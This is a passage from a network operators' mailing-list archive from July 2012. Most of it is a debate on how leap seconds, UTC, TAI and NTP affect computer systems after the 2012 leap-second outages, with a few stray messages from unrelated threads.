+36.99855 University of California Voice: +1 831 459 3046 Lng -122.06015 Santa Cruz, CA 95064 http://www.ucolick.org/~sla/ Hgt +250 m From avg at kotovnik.com Tue Jul 3 20:55:29 2012 From: avg at kotovnik.com (Vadim Antonov) Date: Tue, 03 Jul 2012 18:55:29 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <17BF05B7-AD43-49DA-A9A6-04BA5AE67D51@ucolick.org> References: <4FF37A05.7040305@kotovnik.com> <4FF398AB.2070601@kotovnik.com> <17BF05B7-AD43-49DA-A9A6-04BA5AE67D51@ucolick.org> Message-ID: <4FF3A291.6040900@kotovnik.com> On 7/3/2012 6:28 PM, Steve Allen wrote: > On 2012 Jul 3, at 18:13, Vadim Antonov wrote: >> PS. I would vote for using TAI instead of UTC as the >> non-relativistic time base in computer systems. > > A problem with the use of TAI is that the BIPM and CCTF (who make > TAI) expressed strongly that they do not want it used as a system > time in document CCTF09-27 > http://www.bipm.org/cc/CCTF/Allowed/18/CCTF_09-27_note_on_UTC-ITU-R.pdf > so strongly that they end by contemplating the discontinuation > of TAI. There's always a possibility of using pseudo-TAI internally by reconstructing it from UTC. This is not the best solution (because it requires systems to have long-term memory of past leap seconds, or ability to access a reliable storage of such), but at least this removes the burden of doing complicated time handling from application software. Actually, what they are saying is that they would discontinue TAI *if* definition of UTC is amended to remove future leap seconds. The document makes it clear that they recognize the necessity of continuous coordinate time standard. --vadim From morrowc.lists at gmail.com Tue Jul 3 21:11:16 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 3 Jul 2012 22:11:16 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF3A291.6040900@kotovnik.com> References: <4FF37A05.7040305@kotovnik.com> <4FF398AB.2070601@kotovnik.com> <17BF05B7-AD43-49DA-A9A6-04BA5AE67D51@ucolick.org> <4FF3A291.6040900@kotovnik.com> Message-ID: came for the meme, stayed for the epic rant on time. thanks for making my holiday start awesome. -chris From mysidia at gmail.com Tue Jul 3 21:33:14 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Tue, 3 Jul 2012 21:33:14 -0500 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF3A291.6040900@kotovnik.com> References: <4FF37A05.7040305@kotovnik.com> <4FF398AB.2070601@kotovnik.com> <17BF05B7-AD43-49DA-A9A6-04BA5AE67D51@ucolick.org> <4FF3A291.6040900@kotovnik.com> Message-ID: On 7/3/12, Vadim Antonov wrote: > There's always a possibility of using pseudo-TAI internally by > reconstructing it from UTC. This is not the best solution (because it > requires systems to have long-term memory of past leap seconds, or How about, instead of requiring systems to "remember" past leap seconds; You represent every single timestamp instead of as timestamp = <32-bit int, seconds since jan 1 1970 00:00:00> You represent all system timestamps as tuples: timestamp = ( <32-bint int seconds since jan 1 1970 00:00:00>, ) No need to retain a history. Just retain the data in the same way that Hours, Minutes, and Second are retained. Comparison is simple. (Timestamp2 - Offset2) - (Timestamp1 - Offset1) The downside is you can no longer set your system clock by hand, because humans won't know the right number of "leap seconds" to supply when setting the time from their wall clock. That's a problem necesitating you keep a history anyways. For time to be universally coordinated, it has to be coordinated. One of the basic requirements for system time is that it interacts with humans, and humans have to be able to set their clock from conventional time sources which are based on local time, without the machine having to be constantly updated or reach out on a network and figure out how that translates into a reasonable machine time. -- -JH From jra at baylink.com Tue Jul 3 21:47:02 2012 From: jra at baylink.com (Jay Ashworth) Date: Tue, 03 Jul 2012 22:47:02 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com> References: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi> <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com> Message-ID: No, it really shouldn't. -- Sent from my Android phone with K-9 Mail. Please excuse my brevity. Owen DeLong wrote: On Jul 3, 2012, at 1:09 PM, Saku Ytti wrote: > On (2012-07-03 12:46 -0700), Owen DeLong wrote: > >> If you don't know that time is not monotonically increasing, then that only becomes a software bug when you codify your own ignorance into software you write. > > If only all software could be ordered from you Owen, but in practice this > is not possible. Some code will be written less intelligent people. And > reviewing any code doing foo = timestamp+offset and if now > foo, virtually > never expects time to move backwards. Sure, but even with that, 99% of it has only a passing 'interesting' effect and then recovers. > UTC doesn't move backwards (it goes 59 -> 60 -> 00). TAI does not move > backwards. Unixtime moves backwards, like spanish inquisition no one > expects that. UTC (and the system clock) should not move backwards, but, rather they repeat second 59. UTC goes 58->59->00 most of the time, but during a leap second, it should go 58->59->59->00). It's not so much going backwards as dropping a chime. >> It is well known that leap seconds exist. > > Quite. But it is not well known that unixtime travels backwards. > In part because it shouldn't actually do so. It should simply chime 59 twice. Owen From george.herbert at gmail.com Tue Jul 3 22:15:42 2012 From: george.herbert at gmail.com (George Herbert) Date: Tue, 3 Jul 2012 20:15:42 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> Message-ID: On Tue, Jul 3, 2012 at 4:48 PM, Owen DeLong wrote: >.... > Most people operate on the assumption that there are 86400*365.25 seconds per year overall and that every day is 86,400 seconds. UTC matches that common conception of time. UT1 does not because UT1 monotonically increments one second for every elapsed second of time and continues to drift out of synchronization with the celestial phenomena on which the common conception of time is based. Let's be clear - the "celestial phenomena" vary regularly. The Sun and Moon do not rise and set at the same exact time every day; people would not practically notice a second-a-year skew in this for decades or longer, much less societally have grounds to object to it. And it's only historically been about 0.625 s / yr averaged since 1972. At that long term rate (if that's what it ended up being) it would be about a minute a century, or 6000 years before we saw things happening a whole hour off from "expected solar time", which to be frank stops being meaningful around when you have real clocks and astronomy. The only people for which the celestial phenomena timing matters this precisely are astronomers, who ALREADY have to do their own things to keep everything straight, much more precisely than the leap seconds correct the ongoing skews. This (irregular leap seconds) is a solution which is monumentally badly matched to the actual problem set. >> NTP can keep time in UTC (or anything else) if it wants, but it should discipline the system clock to monotonically increasing UT1. > > This will break many many currently correct applications and is not a change that should be undertaken lightly. Especially not if it is intended to fix a moderately esoteric bug in a few things that crops up once per decade or so. I would argue exactly the opposite. It's unpredictable and irregular enough that a nearly completely new set of software and administrators are what encounters it each time it comes through. It broke chunks of the internet this time. Last time, this was a "Oh, well, some geeks inconvenienced, shrug". This time it was fortunately small enough (esp. in comparison to the recent AWS outage due to more malign natural forces) that it wasn't a big deal. It could be more disruptive next time. >From an Internet Stability point of view, one can easily take the position that This Just Does Not Do. So - It's there to keep us in sync with the stars, except it's done in increments nobody will notice but astronomers, who have to do better than that anyways; it disrupts technology, to a mild to moderate degree. Why are we doing it again? I like this atomic time thing. It's sounding better and better each day we keep arguing about it. If it bothers you that much we can schedule in a leap hour for Y8000 (or, Y5000, Y11000, Y17000, ....). It's not a butthead thing to do to assert that the Internet's stability in this matter now outweighs an arbitrary and abstract argument among timekeepers. We matter more than they do, now. If they want to keep a more true Solar Time they can do so; we can run on atomic and put this silly notion of trying to say Sun-centric behind us. This is the 21st century. Leapsecondo Delenda Est! -- -george william herbert george.herbert at gmail.com From tyler.haske at gmail.com Tue Jul 3 22:33:35 2012 From: tyler.haske at gmail.com (Tyler Haske) Date: Tue, 3 Jul 2012 23:33:35 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> Message-ID: On Tue, Jul 3, 2012 at 11:15 PM, George Herbert wrote: > > It's not a butthead thing to do to assert that the Internet's > stability in this matter now outweighs an arbitrary and abstract > argument among timekeepers. We matter more than they do, now. If > they want to keep a more true Solar Time they can do so; we can run on > atomic and put this silly notion of trying to say Sun-centric behind > us. This is the 21st century. > > Leapsecondo Delenda Est! I don't see why everyday computers, servers, and routers need the functionality to add (or subtract) an arbitrary second once every 3 or 4 years. These things are supposed to be synced to a NTP source anyway. Easiest solution is just remove leap second functionality from mainline code, and make it something you have to special-compile for. The fact there is a 400 page book on the subject really makes me wonder how well the average kernel hacker is doing the implementation. (Oh wait, we saw EXACTLY how well it was done). All this is a time bomb (lame I know) waiting to go off every few years there is a leap second. We get to find out which servers are running which out-of-date kernels that attempt to implement some arcane time function practically no one cares about. (Sorry time aficionados. I appreciate your work, but I'd rather just look it up and not trust my computer to calculate it.) From msa at latt.net Tue Jul 3 22:59:32 2012 From: msa at latt.net (Majdi S. Abbas) Date: Tue, 3 Jul 2012 23:59:32 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> Message-ID: <20120704035932.GA20652@puck.nether.net> On Tue, Jul 03, 2012 at 11:33:35PM -0400, Tyler Haske wrote: > 4 years. These things are supposed to be synced to a NTP source > anyway. > > Easiest solution is just remove leap second functionality from > mainline code, and make it something you have to special-compile for. Please reconcile these two statements. Thanks, --msa From tyler.haske at gmail.com Tue Jul 3 23:02:57 2012 From: tyler.haske at gmail.com (Tyler Haske) Date: Wed, 4 Jul 2012 00:02:57 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120704035932.GA20652@puck.nether.net> References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> <20120704035932.GA20652@puck.nether.net> Message-ID: On Tue, Jul 3, 2012 at 11:59 PM, Majdi S. Abbas wrote: > On Tue, Jul 03, 2012 at 11:33:35PM -0400, Tyler Haske wrote: >> 4 years. These things are supposed to be synced to a NTP source >> anyway. >> >> Easiest solution is just remove leap second functionality from >> mainline code, and make it something you have to special-compile for. > > Please reconcile these two statements. > > Thanks, > > --msa Someone running an NTP Server connected to a cesium clock could run the leap-second time code. Since its *their job* to have the correct time, they can do all the fancy rarely used things that make parts of the Internet die every couple of years. From msa at latt.net Tue Jul 3 23:19:49 2012 From: msa at latt.net (Majdi S. Abbas) Date: Wed, 4 Jul 2012 00:19:49 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com> References: <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi> <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com> Message-ID: <20120704041949.GB20652@puck.nether.net> On Tue, Jul 03, 2012 at 04:53:32PM -0700, Owen DeLong wrote: > UTC (and the system clock) should not move backwards, but, rather they repeat > second 59. UTC goes 58->59->00 most of the time, but during a leap second, it > should go 58->59->59->00). It's not so much going backwards as dropping a > chime. Owen, ...that is going backwards, since we'll repeat 59.XXXXXX. Which is really bad for a lot of applications, system timers, pretty much any database, sleep mechanisms, locking mechanisms, etc. What happens if you were trying to execute some code at 59.5926725? Has it already happened or is it yet to come? Looking back at two financial transactions, which came first? I've had an environment where large reverse steps occured with some regularity -- you don't want to go there. At all. There is a LOT more software that wigs out when you reverse step the clock (which you will be, if you 'repeat' a second.) than does when a leap occurs. > In part because it shouldn't actually do so. It should simply chime 59 twice. You must have written some NMEA code in a past life. I'd be fine with rolling TAI for systems use, but it does not make much sense to condemn the leap second in UTC for this. We've had a fair number of them, in the Internet age, without this much trouble. This is about bad software development. If you change something like the leap second handler in your code, please test it. If not right away, before 2 more leap seconds have occured several years down the road. Also, people that build production environments on operating systems that do not receive that sort of testing, do so at their own risk. That's their fault, despite any fist shaking/angry tweeting at 23:59:60. It's pathetic that advertising clocks in public places can get this right (and did in 2008) and 'the Internet' cannot: http://www.youtube.com/watch?v=PJ4TWChcKpI --msa From paul at paulgraydon.co.uk Tue Jul 3 23:29:01 2012 From: paul at paulgraydon.co.uk (Paul Graydon) Date: Tue, 03 Jul 2012 18:29:01 -1000 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com> References: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi> <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com> Message-ID: <4FF3C68D.4070200@paulgraydon.co.uk> On 7/3/2012 1:53 PM, Owen DeLong wrote: > > UTC (and the system clock) should not move backwards, but, rather they repeat > second 59. UTC goes 58->59->00 most of the time, but during a leap second, it > should go 58->59->59->00). It's not so much going backwards as dropping a chime. > If they do that, they're "doing it wrong", UTC and the system clock should go 58->59->60->00. From the IERS bulletin announcing the leap second just past: http://hpiers.obspm.fr/iers/bul/bulc/bulletinc.dat "A positive leap second will be introduced at the end of June 2012. The sequence of dates of the UTC second markers will be: 2012 June 30, 23h 59m 59s 2012 June 30, 23h 59m 60s 2012 July 1, 0h 0m 0s" From sla at ucolick.org Tue Jul 3 23:41:09 2012 From: sla at ucolick.org (Steve Allen) Date: Tue, 3 Jul 2012 21:41:09 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF3C68D.4070200@paulgraydon.co.uk> References: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi> <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com> <4FF3C68D.4070200@paulgraydon.co.uk> Message-ID: <2A643BE4-04A3-480B-ACCE-788B01ABC8AB@ucolick.org> On 2012 Jul 3, at 21:29, Paul Graydon wrote: > http://hpiers.obspm.fr/iers/bul/bulc/bulletinc.dat Which is simply reiterating an older version of the regulatory document that specifies how UTC shall be done http://www.itu.int/rec/R-REC-TF.460/en On paper it is a scheme that will work for 1000 years, but the original regulation contained no implementation details, no interoperability studies, no agency responsible for describing how implementations might communicate requirements, and that paper was locked behind a paywall for the first 40 years of its existence. All of that is too late to fix now. The events in January showed that the notion of simply abandoning leap seconds could not achieve consensus required for change. We are in Disney's Haunted Mansion with the spirit taunting us to find a way out. -- Steve Allen WGS-84 (GPS) UCO/Lick Observatory Natural Sciences II, Room 165 Lat +36.99855 University of California Voice: +1 831 459 3046 Lng -122.06015 Santa Cruz, CA 95064 http://www.ucolick.org/~sla/ Hgt +250 m From saku at ytti.fi Wed Jul 4 01:27:22 2012 From: saku at ytti.fi (Saku Ytti) Date: Wed, 4 Jul 2012 09:27:22 +0300 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com> References: <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> <20120703175905.GA15977@pob.ytti.fi> <5ED4796A-4F15-484F-9F5C-AA94C095D3E2@delong.com> <20120703200953.GA16042@pob.ytti.fi> <952F93D4-E6B1-49C5-9694-E9292E3A4E36@delong.com> Message-ID: <20120704062722.GA16614@pob.ytti.fi> On (2012-07-03 16:53 -0700), Owen DeLong wrote: > Sure, but even with that, 99% of it has only a passing 'interesting' effect and > then recovers. Inclusive you no longer know order of events based on your logs, and virtually none of your software are logging 60th second. What are only interesting and what can cause with luck (or bad luck) catastrophic failures is guess work, no one is going to review all the code written, and almost all of it assumes monotonic time. > > Quite. But it is not well known that unixtime travels backwards. > In part because it shouldn't actually do so. It should simply chime 59 twice. Chiming 59 twice is traveling backwards. It goes to what ever precision you have between 59 and 00, then it goes back to 59 flat. -- ++ytti From waseem_aliraqi at yahoo.com Wed Jul 4 02:13:30 2012 From: waseem_aliraqi at yahoo.com (Waseem) Date: Wed, 4 Jul 2012 00:13:30 -0700 (PDT) Subject: Arbor network Message-ID: <1341386010.66568.YahooMailNeo@web160406.mail.bf1.yahoo.com> Hi, Anybody using?Arbor Peakflow? Can tell us about its efficiency? Any other DDoS detection and mitigation product ? Regards, Waseem? From rs at seastrom.com Wed Jul 4 08:48:30 2012 From: rs at seastrom.com (Robert E. Seastrom) Date: Wed, 04 Jul 2012 09:48:30 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: (Tyler Haske's message of "Wed, 4 Jul 2012 00:02:57 -0400") References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> <20120704035932.GA20652@puck.nether.net> Message-ID: <86vci31vtd.fsf@seastrom.com> Tyler Haske writes: > Someone running an NTP Server connected to a cesium clock could run > the leap-second time code. Since its *their job* to have the correct > time, they can do all the fancy rarely used things that make parts of > the Internet die every couple of years. Ah, Tyler, I see the problem here. An NTP server is not like an XML-spitting web server which one consults each and every time one wants to know a piece of data (for instance a stock quote, the weather, or in this case, what time it is). NTP assumes a local clock, and the results of periodic queries to higher-than-or-equal-to-local-stratum servers are used to _discipline_ the local clock, steering it to have minimal error. Local clocks have to be consulted much too frequently (logging, timestamping, etc) for "just put it in the cloud" to work. You might want to read up on NTP (wikipedia provides a reasonable introduction). cheers, -r From kyle.creyts at gmail.com Wed Jul 4 10:37:07 2012 From: kyle.creyts at gmail.com (Kyle Creyts) Date: Wed, 4 Jul 2012 11:37:07 -0400 Subject: FYI Netflix is down In-Reply-To: References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> Message-ID: Tell that to people in the third world without utilities. On Jul 3, 2012 8:32 PM, "Randy Bush" wrote: > > Also, I don't think there is an acceptable level of downtime for > > water. > > coming soon to a planet near you > > randy > > From mysidia at gmail.com Wed Jul 4 10:50:46 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Wed, 4 Jul 2012 10:50:46 -0500 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <86vci31vtd.fsf@seastrom.com> References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> <20120704035932.GA20652@puck.nether.net> <86vci31vtd.fsf@seastrom.com> Message-ID: On 7/4/12, Robert E. Seastrom wrote: [snip] > Local clocks have to be consulted much too frequently (logging, > timestamping, etc) for "just put it in the cloud" to work. > You might want to read up on NTP (wikipedia provides a reasonable > introduction). The NTP daemon could still provide a configuration option to not implement leap-seconds locally, or ignore the leap-second announcement received. So the admin can make a tradeoff favoring Stability over Correctness, of _allowing_ the local clock to become 1 second inaccurate for a short time after the rare occasion of a leap second; and step it or slew the local clock, eg include the leap second in the ordinary time correction, averaged over a period of time instead of a 1 second jump. The breakage doesn't occur for whatever reason when the time is stepped forward or backwards, or slewwed. So accept the inaccuracy and correct the clock in the normal way that NTP corrects clocks that have drifted. -- -JH From sla at ucolick.org Wed Jul 4 10:58:11 2012 From: sla at ucolick.org (Steve Allen) Date: Wed, 4 Jul 2012 08:58:11 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> <20120704035932.GA20652@puck.nether.net> <86vci31vtd.fsf@seastrom.com> Message-ID: <5AF41F8F-12E3-401A-956E-D02319711858@ucolick.org> On 2012 Jul 4, at 08:50, Jimmy Hess wrote: > So accept the inaccuracy and correct the clock in the normal way that > NTP corrects clocks that have drifted. This is basically the "leap smear" that google instituted after the issues in 2005. It works nicely in cloud applications where real-time is not an issue. It does not work so well when precision calculations of real-time physics are important, nor in heterogeneous environments where not all devices pay attention to NTP or some handle the leap differently than others. Those are places where a kernel should never be asked to do what the combination of POSIX and leap seconds demand. -- Steve Allen WGS-84 (GPS) UCO/Lick Observatory Natural Sciences II, Room 165 Lat +36.99855 University of California Voice: +1 831 459 3046 Lng -122.06015 Santa Cruz, CA 95064 http://www.ucolick.org/~sla/ Hgt +250 m From scott at doc.net.au Wed Jul 4 12:22:46 2012 From: scott at doc.net.au (Scott Howard) Date: Wed, 4 Jul 2012 10:22:46 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <34ebe2600b91d04f9c049d59eb7e13da@mail.dessus.com> <93CF45BC-2753-48D4-9AC6-0926DF4AD815@delong.com> <20120704035932.GA20652@puck.nether.net> <86vci31vtd.fsf@seastrom.com> Message-ID: On Wed, Jul 4, 2012 at 8:50 AM, Jimmy Hess wrote: > The NTP daemon could still provide a configuration option to not > implement leap-seconds locally, or ignore the leap-second > announcement received. So the admin can make a tradeoff favoring > Stability over Correctness, of _allowing_ the local clock to become 1 > second inaccurate for a short time after the rare occasion of a leap > second; and step it or slew the local clock, eg include the leap > second in the ordinary time correction, averaged over a period of > time instead of a 1 second jump. > Unless I'm mis-reading things, it already does - of sorts. According to the ntpd website ( http://www.ntp.org/ntpfaq/NTP-s-algo-real.htm#AEN2499) : *The theory of leap seconds in explained in Q: 2.4.. In reality there are two cases to consider: If the operating system implements the kernel discipline described in Section 5.2, ntpd will announce insertion and deletion of leap seconds to the kernel. The kernel will handle the leap seconds without further action necessary. If the operating system does not implement the kernel discipline, the clock will show an error of one second relative to NTP's time immediate after the leap second. The situation will be handled just like an unexpected change of time: The operating system will continue with the wrong time for some time, but eventually ntpd will step the time. Effectively this will cause the correction for leap seconds to be applied too late. * Linux does implement the "kernel discipline" (via ntp_adjtime), so the first option is what normally happens. However you can disable this with an ntpd config option ("disable kernel") or via ntpdc at which point I'm presuming it will fall back to the second option. The second option still gives you a step, but using the -x option to NTPD will slew this step, giving a gradual correction to the 1 second difference. Of course there would be side effects of this (the kernel implementation of NTP is there for a reason, and this disables it), but at least it's better than a server hang... Scott. From rbf+nanog at panix.com Wed Jul 4 12:44:40 2012 From: rbf+nanog at panix.com (Brett Frankenberger) Date: Wed, 4 Jul 2012 12:44:40 -0500 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <49423.1341348864@turing-police.cc.vt.edu> References: <49423.1341348864@turing-police.cc.vt.edu> Message-ID: <20120704174439.GA2363@panix.com> On Tue, Jul 03, 2012 at 04:54:24PM -0400, valdis.kletnieks at vt.edu wrote: > On Tue, 03 Jul 2012 21:49:40, Peter Lothberg said: > > > Leapseconds can be both positive and negative, but up to now, the > > earth has only slowed down, so we have added seconds. > > That's what many people believe, but it's not exactly right. Leap seconds > are added for the exact same reason leap days are - the earth's rotation > isn't a clean multiple of the year. We know we need to stick in an entire > leap day every 4 years or so, then add the 400 hack to get it closer. At > that point, it's *really* close, to the point where just shimming in a second > every once in a while is enough to get it back in sync. > > The earth's slowdown (or speedup) is measured by *how often* we > need to add leap seconds. If we needed to add one every 3 years, but > the frequency rises to once every 2.5 years, *that* indicates slowing. > In other words, the slowdown or speedup is the first derivative of > the rate that UT and TAI diverge - if the earth rotated at constant > speed, the derivative would be zero, and we'd insert leap seconds on > a nice predictable schedule. Leap Seconds and Leap Years are completely unrelated and solve two completely different problems. Leap Seconds exist to adjust time to match the Earth's actual rotation. They exist because the solar day is not exactly 24 hours. Leap Years exist to adjust time to match the Earth's actual revolution around the Sun. They exist because the that time period isn't exactly 365 days. Without leap seconds, the sun stops being overhead at noon. Without leap years, the equinozes and solstices start drifting to different days. -- Brett From valdis.kletnieks at vt.edu Wed Jul 4 16:02:02 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Wed, 04 Jul 2012 17:02:02 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Your message of "Wed, 04 Jul 2012 12:44:40 -0500." <20120704174439.GA2363@panix.com> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> Message-ID: <123072.1341435722@turing-police.cc.vt.edu> On Wed, 04 Jul 2012 12:44:40 -0500, Brett Frankenberger said: > Leap Seconds and Leap Years are completely unrelated and solve two > completely different problems. > > Leap Seconds exist to adjust time to match the Earth's actual rotation. > They exist because the solar day is not exactly 24 hours. > > Leap Years exist to adjust time to match the Earth's actual revolution > around the Sun. They exist because the that time period isn't exactly > 365 days. Actually, it's the same exact problem - an astronomical value isn't exactly conformant to the civil value, and thus adjustments are needed. And you missed the bigger point - that leap seconds aren't needed because the earth is slowing any more than leap days are needed because the year is getting longer. If an actual siderial day was a fixed unchanging 86400.005 seconds long, you'd still need a leap second every 200 days. *SLOWING* would be indicated by the "every 200 days" changing to "every 175" or "every 150". For bonus points - at the current rate of slowing, in what year will the day be of sufficient length that the current "rule of 400" for leap days requires changing? You may assume that the orbital parameters of the Earth do not also change. :) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From bill at herrin.us Wed Jul 4 17:10:45 2012 From: bill at herrin.us (William Herrin) Date: Wed, 4 Jul 2012 18:10:45 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120704174439.GA2363@panix.com> References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> Message-ID: On Wed, Jul 4, 2012 at 1:44 PM, Brett Frankenberger wrote: > Without leap seconds, the sun stops being overhead at noon. But that's ridiculous. The sun *isn't* overhead at noon except at one particular longitude within each time zone. Everywhere else time synch to local noon is +/- half an hour. IMO, leap seconds are a really bad idea. Let the vanishingly few people who care about a precision match against the solar day keep track of the deviation from clock time and let everybody else have a *simple* clock year after year. When the deviation increases to an hour every what, thousand years? Then you can do a big, well publicized correction where everybody is paying attention to making it work instead of being caught by surprise. Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From jhellenthal at dataix.net Wed Jul 4 17:29:27 2012 From: jhellenthal at dataix.net (Jason Hellenthal) Date: Wed, 4 Jul 2012 18:29:27 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <49423.1341348864@turing-police.cc.vt.edu> <20120704174439.GA2363@panix.com> Message-ID: <20120704222927.GA19945@DataIX.net> On Wed, Jul 04, 2012 at 06:10:45PM -0400, William Herrin wrote: > On Wed, Jul 4, 2012 at 1:44 PM, Brett Frankenberger wrote: > > Without leap seconds, the sun stops being overhead at noon. > > But that's ridiculous. The sun *isn't* overhead at noon except at one > particular longitude within each time zone. Everywhere else time synch > to local noon is +/- half an hour. > > IMO, leap seconds are a really bad idea. Let the vanishingly few > people who care about a precision match against the solar day keep > track of the deviation from clock time and let everybody else have a > *simple* clock year after year. When the deviation increases to an > hour every what, thousand years? Then you can do a big, well > publicized correction where everybody is paying attention to making it > work instead of being caught by surprise. > Yeah but what you don't understand is that manual navigation after a certain point of difference becomes inaccurate to a degree that is unacceptable by most military standards. 100 or a 1000 years the difference is too big. Someone somewhere at some point evaluated this need in the range of "0.3 - 0.9? in order for nauticle and other means of direction to not be impacted. It would be easy to disagree and say "Well! we have GPS and other such digital devices to tell where you are now!"... and if those go out just like all these failing Java Apps ?. I would not want to be the guy that would have to calculate all possible differences just to attempt to get a accurate location and then find out the math was wrong and you are 100 miles off target. Just sayin! -- - (2^(N-1)) From randy at psg.com Wed Jul 4 17:55:17 2012 From: randy at psg.com (Randy Bush) Date: Thu, 05 Jul 2012 07:55:17 +0900 Subject: FYI Netflix is down In-Reply-To: References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> Message-ID: > Tell that to people in the 